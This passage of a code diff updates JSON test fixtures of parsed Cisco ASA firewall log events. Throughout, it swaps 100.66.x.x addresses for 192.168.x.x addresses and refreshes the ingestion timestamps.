"original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:34:28.099512400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 
@@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721613400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099518200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721617600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099577300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" 
@@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721621900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099586Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721627Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099590Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721631500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099596200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721635800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099601200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721640100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099606800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721644500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099612900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721648700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099618800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721652800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099639800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721656900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099645500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721661500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099667900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, 
@@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721665700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099673500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721670100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:34:28.099679200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, 
@@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721674400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:34:28.099684800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721678700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:34:28.099688900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" 
@@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721682900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099692300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721687200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:34:28.099696600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721691400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099701700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, 
@@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721695700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:34:28.099706500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721699900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:34:28.099712200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721704200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:34:28.099716400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721708400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:34:28.099720700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721712700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:34:28.099724100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721716700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:34:28.099728400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721721100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:34:28.099734100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721725200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:34:28.099739700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721729900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:34:28.099745700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
